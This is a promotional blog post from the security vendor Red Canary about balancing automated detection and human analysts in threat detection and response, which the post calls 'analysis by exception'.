The division of security labor between human and machine is constantly shifting. Depending on your organization’s maturity and size, it can be difficult to find the right balance.
At Red Canary, our philosophy is to start from the outcome you’re trying to deliver. To find the optimal role for the analyst, it’s helpful to ask yourself the question: “What would my analyst need to do to spot a threat among all the noise?” Once you’ve identified what the human needs, the goal is to automate the process as much as possible. You don’t want unnecessary human involvement to slow down response. That’s why we start with known threats we’re trying to detect, then build in detection rules and analytics to try and find those. At the front end of that threat filter, our automation is dealing with a lot of noise and false positives. But, once we start applying more and more sophisticated rules, we illuminate—or filter out—less important information until we wind up with a much smaller number of likely threats that warrant additional analysis.
That’s where the human element becomes most valuable.
Push automation as far as it can go
The more we can extend this process of filtering, the more we free our human analysts for more high-level activities, like examining threats, establishing attack timelines, and pinpointing the root cause of a threat. It’s a matter of pushing automation as far into the process as possible. And we haven’t yet reached the limits of what machine intelligence can do in this sphere.
That’s not to say that automation will ever take over the human component of security. Sure, it would make scaling easier, but there will always be insight, analysis and investigation from human beings that cannot be replicated by machines. While automation may not be possible for all classes of threats, the range of those threats to which we can detect and respond through automation will continue to expand. The goal is to monitor more with fewer people, while gaining optimal assistance from automation.
So where is machine intelligence best used? Patterns of behavior.
The Red Canary detection pipeline is based on behavior analytics. We look at chains of behaviors on endpoints and other data sources that indicate a likely threat. Automation and machine intelligence are great at seeing patterns of anomalies or behaviors that warrant an analyst’s attention—but that’s not the end of automation’s role.
Once the analyst has a chance to look at a pattern, automation can help compare those suspicious patterns to innumerable past known threats. That speeds up and sharpens our ability to also apply a proven response. If it’s something new, we can quickly focus on analyzing the threat and providing the proper remediation guidance. Using automation in this efficient way speeds up the process and the mean time to respond considerably.
Analysis by exception
We call this process “analysis by exception.” It ensures the highest use of our experts’ time by tasking them only with those things they’re uniquely best at and that don’t have an automated alternative. But to support this level of efficient use of talent, it’s critical to keep our threat information up-to-date and our automation reliable.
Not only does this approach increase the efficiency and speed of threat detection and response, but it also frees our analysts to participate in the creation of the rules that make the automated processes effective. It’s a virtuous cycle. You improve future outcomes by making the best use of your previous outcomes. It also gives your analysts more time to fine tune their defense approaches for further improved outcomes.
Part of the benefit of this human-machine cooperation from Red Canary is that you don’t have to do it. We provide both the machine and the human sides, so you don’t have to add headcount or invest in security training. We’ve been on this learning curve for years just so you don’t have to be.
Find out more about how Red Canary adds the right balance of human and automated capabilities to your cybersecurity.